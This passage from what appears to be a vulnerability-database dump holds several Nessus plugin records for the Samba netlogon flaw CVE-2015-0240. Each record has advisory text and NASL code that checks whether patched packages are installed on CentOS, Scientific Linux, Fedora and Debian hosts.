\"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 7.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"libsmbclient-4.1.1-38.el7_0\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"libsmbclient-devel-4.1.1-38.el7_0\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"libwbclient-4.1.1-38.el7_0\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"libwbclient-devel-4.1.1-38.el7_0\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"samba-4.1.1-38.el7_0\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"samba-client-4.1.1-38.el7_0\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"samba-common-4.1.1-38.el7_0\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"samba-dc-4.1.1-38.el7_0\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"samba-dc-libs-4.1.1-38.el7_0\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"samba-devel-4.1.1-38.el7_0\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"samba-libs-4.1.1-38.el7_0\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"samba-pidl-4.1.1-38.el7_0\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"samba-python-4.1.1-38.el7_0\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"samba-test-4.1.1-38.el7_0\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"samba-test-devel-4.1.1-38.el7_0\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"samba-vfs-glusterfs-4.1.1-38.el7_0\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"samba-winbind-4.1.1-38.el7_0\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"samba-winbind-clients-4.1.1-38.el7_0\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"samba-winbind-krb5-locator-4.1.1-38.el7_0\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"samba-winbind-modules-4.1.1-38.el7_0\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libsmbclient / libsmbclient-devel / libwbclient / libwbclient-devel / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-03T12:13:05", "bulletinFamily": "scanner", "description": "An uninitialized pointer use flaw was found in the Samba daemon\n(smbd). A malicious Samba client could send specially crafted netlogon\npackets that, when processed by smbd, could potentially lead to\narbitrary code execution with the privileges of the user running smbd\n(by default, the root user). (CVE-2015-0240)\n\nAfter installing this update, the smb service will be restarted\nautomatically.", "modified": "2019-11-02T00:00:00", "id": "SL_20150223_SAMBA_ON_SL5_X.NASL", "href": "https://www.tenable.com/plugins/nessus/81477", "published": "2015-02-24T00:00:00", "title": "Scientific Linux Security Update : samba on SL5.x i386", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(81477);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2018/12/28 10:10:35\");\n\n script_cve_id(\"CVE-2015-0240\");\n\n script_name(english:\"Scientific Linux Security Update : samba on SL5.x i386\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An uninitialized pointer use flaw was found in the Samba daemon\n(smbd). A malicious Samba client could send specially crafted netlogon\npackets that, when processed by smbd, could potentially lead to\narbitrary code execution with the privileges of the user running smbd\n(by default, the root user). (CVE-2015-0240)\n\nAfter installing this update, the smb service will be restarted\nautomatically.\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1502&L=scientific-linux-errata&T=0&P=1523\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?23a1eeda\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/02/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/02/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL5\", cpu:\"i386\", reference:\"samba3x-3.6.23-9.el5_11\")) flag++;\nif (rpm_check(release:\"SL5\", cpu:\"i386\", reference:\"samba3x-client-3.6.23-9.el5_11\")) flag++;\nif (rpm_check(release:\"SL5\", cpu:\"i386\", reference:\"samba3x-common-3.6.23-9.el5_11\")) flag++;\nif (rpm_check(release:\"SL5\", cpu:\"i386\", reference:\"samba3x-debuginfo-3.6.23-9.el5_11\")) flag++;\nif (rpm_check(release:\"SL5\", cpu:\"i386\", reference:\"samba3x-doc-3.6.23-9.el5_11\")) flag++;\nif (rpm_check(release:\"SL5\", cpu:\"i386\", reference:\"samba3x-domainjoin-gui-3.6.23-9.el5_11\")) flag++;\nif (rpm_check(release:\"SL5\", cpu:\"i386\", reference:\"samba3x-swat-3.6.23-9.el5_11\")) flag++;\nif (rpm_check(release:\"SL5\", cpu:\"i386\", reference:\"samba3x-winbind-3.6.23-9.el5_11\")) flag++;\nif (rpm_check(release:\"SL5\", cpu:\"i386\", reference:\"samba3x-winbind-devel-3.6.23-9.el5_11\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-01T02:15:26", "bulletinFamily": "scanner", "description": "Updated samba packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 6.\n\nRed Hat Product Security has rated this update as having Critical\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nSamba is an open source implementation of the Server Message Block\n(SMB) or Common Internet File System (CIFS) protocol, which allows\nPC-compatible machines to share files, printers, and other\ninformation.\n\nAn uninitialized pointer use flaw was found in the Samba daemon\n(smbd). A malicious Samba client could send specially crafted netlogon\npackets that, when processed by smbd, could potentially lead to\narbitrary code execution with the privileges of the user running smbd\n(by default, the root user). (CVE-2015-0240)\n\nFor additional information about this flaw, see the Knowledgebase\narticle at https://access.redhat.com/articles/1346913\n\nRed Hat would like to thank the Samba project for reporting this\nissue. Upstream acknowledges Richard van Eeden of Microsoft\nVulnerability Research as the original reporter of this issue.\n\nAll Samba users are advised to upgrade to these updated packages,\nwhich contain a backported patch to correct this issue. After\ninstalling this update, the smb service will be restarted\nautomatically.", "modified": "2019-11-02T00:00:00", "id": "CENTOS_RHSA-2015-0251.NASL", "href": "https://www.tenable.com/plugins/nessus/81442", "published": "2015-02-24T00:00:00", "title": "CentOS 6 : samba (CESA-2015:0251)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2015:0251 and \n# CentOS Errata and Security Advisory 2015:0251 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(81442);\n script_version(\"1.15\");\n script_cvs_date(\"Date: 2019/10/02 15:30:19\");\n\n script_cve_id(\"CVE-2015-0240\");\n script_bugtraq_id(72711);\n script_xref(name:\"RHSA\", value:\"2015:0251\");\n\n script_name(english:\"CentOS 6 : samba (CESA-2015:0251)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated samba packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 6.\n\nRed Hat Product Security has rated this update as having Critical\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nSamba is an open source implementation of the Server Message Block\n(SMB) or Common Internet File System (CIFS) protocol, which allows\nPC-compatible machines to share files, printers, and other\ninformation.\n\nAn uninitialized pointer use flaw was found in the Samba daemon\n(smbd). A malicious Samba client could send specially crafted netlogon\npackets that, when processed by smbd, could potentially lead to\narbitrary code execution with the privileges of the user running smbd\n(by default, the root user). (CVE-2015-0240)\n\nFor additional information about this flaw, see the Knowledgebase\narticle at https://access.redhat.com/articles/1346913\n\nRed Hat would like to thank the Samba project for reporting this\nissue. Upstream acknowledges Richard van Eeden of Microsoft\nVulnerability Research as the original reporter of this issue.\n\nAll Samba users are advised to upgrade to these updated packages,\nwhich contain a backported patch to correct this issue. After\ninstalling this update, the smb service will be restarted\nautomatically.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2015-February/020943.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?ae8d4d13\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected samba packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:libsmbclient\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:libsmbclient-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba-domainjoin-gui\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba-glusterfs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba-swat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba-winbind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba-winbind-clients\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba-winbind-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba-winbind-krb5-locator\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/02/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/02/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/02/24\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 6.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-6\", reference:\"libsmbclient-3.6.23-14.el6_6\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"libsmbclient-devel-3.6.23-14.el6_6\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba-3.6.23-14.el6_6\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba-client-3.6.23-14.el6_6\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba-common-3.6.23-14.el6_6\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba-doc-3.6.23-14.el6_6\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba-domainjoin-gui-3.6.23-14.el6_6\")) flag++;\nif (rpm_check(release:\"CentOS-6\", cpu:\"x86_64\", reference:\"samba-glusterfs-3.6.23-14.el6_6\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba-swat-3.6.23-14.el6_6\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba-winbind-3.6.23-14.el6_6\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba-winbind-clients-3.6.23-14.el6_6\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba-winbind-devel-3.6.23-14.el6_6\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba-winbind-krb5-locator-3.6.23-14.el6_6\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libsmbclient / libsmbclient-devel / samba / samba-client / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-01T02:27:21", "bulletinFamily": "scanner", "description": "Update to Samba 4.1.17 to address CVE-2015-0240 - RCE in netlogon.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2019-11-02T00:00:00", "id": "FEDORA_2015-2538.NASL", "href": "https://www.tenable.com/plugins/nessus/81533", "published": "2015-02-26T00:00:00", "title": "Fedora 21 : samba-4.1.17-1.fc21 (2015-2538)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2015-2538.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(81533);\n script_version(\"$Revision: 1.2 $\");\n script_cvs_date(\"$Date: 2015/10/19 23:06:17 $\");\n\n script_xref(name:\"FEDORA\", value:\"2015-2538\");\n\n script_name(english:\"Fedora 21 : samba-4.1.17-1.fc21 (2015-2538)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Update to Samba 4.1.17 to address CVE-2015-0240 - RCE in netlogon.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2015-February/150450.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?b4b55624\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected samba package.\");\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:samba\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:21\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/02/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/02/26\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^21([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 21.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC21\", reference:\"samba-4.1.17-1.fc21\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"samba\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-01T02:19:05", "bulletinFamily": "scanner", "description": "Richard van Eeden of Microsoft Vulnerability Research discovered that\nSamba, a SMB/CIFS file, print, and login server for Unix, contains a\nflaw in the netlogon server code which allows remote code execution\nwith root privileges from an unauthenticated connection.\n\nFor the oldstable distribution (squeeze), this problem has been fixed\nin version 2:3.5.6~dfsg-3squeeze12.\n\nFor the stable distribution (wheezy), this problem has been fixed in\nversion 2:3.6.6-6+deb7u5.\n\nWe recommend that you upgrade your samba packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.", "modified": "2019-11-02T00:00:00", "id": "DEBIAN_DLA-156.NASL", "href": "https://www.tenable.com/plugins/nessus/82139", "published": "2015-03-26T00:00:00", "title": "Debian DLA-156-1 : samba security update", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-156-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(82139);\n script_version(\"1.12\");\n script_cvs_date(\"Date: 2018/07/06 11:26:06\");\n\n script_cve_id(\"CVE-2015-0240\");\n script_bugtraq_id(72711);\n\n script_name(english:\"Debian DLA-156-1 : samba security update\");\n script_summary(english:\"Checks dpkg output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Richard van Eeden of Microsoft Vulnerability Research discovered that\nSamba, a SMB/CIFS file, print, and login server for Unix, contains a\nflaw in the netlogon server code which allows remote code execution\nwith root privileges from an unauthenticated connection.\n\nFor the oldstable distribution (squeeze), this problem has been fixed\nin version 2:3.5.6~dfsg-3squeeze12.\n\nFor the stable distribution (wheezy), this problem has been fixed in\nversion 2:3.6.6-6+deb7u5.\n\nWe recommend that you upgrade your samba packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2015/02/msg00010.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/squeeze-lts/samba\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libpam-smbpass\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libsmbclient\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libsmbclient-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libwbclient0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:samba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:samba-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:samba-common-bin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:samba-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:samba-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:samba-doc-pdf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:samba-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:smbclient\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:swat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:winbind\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:6.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/02/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/03/26\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"6.0\", prefix:\"libpam-smbpass\", reference:\"2:3.5.6~dfsg-3squeeze12\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libsmbclient\", reference:\"2:3.5.6~dfsg-3squeeze12\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libsmbclient-dev\", reference:\"2:3.5.6~dfsg-3squeeze12\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libwbclient0\", reference:\"2:3.5.6~dfsg-3squeeze12\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"samba\", reference:\"2:3.5.6~dfsg-3squeeze12\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"samba-common\", reference:\"2:3.5.6~dfsg-3squeeze12\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"samba-common-bin\", reference:\"2:3.5.6~dfsg-3squeeze12\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"samba-dbg\", reference:\"2:3.5.6~dfsg-3squeeze12\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"samba-doc\", reference:\"2:3.5.6~dfsg-3squeeze12\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"samba-doc-pdf\", reference:\"2:3.5.6~dfsg-3squeeze12\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"samba-tools\", reference:\"2:3.5.6~dfsg-3squeeze12\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"smbclient\", reference:\"2:3.5.6~dfsg-3squeeze12\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"swat\", reference:\"2:3.5.6~dfsg-3squeeze12\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"winbind\", reference:\"2:3.5.6~dfsg-3squeeze12\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else 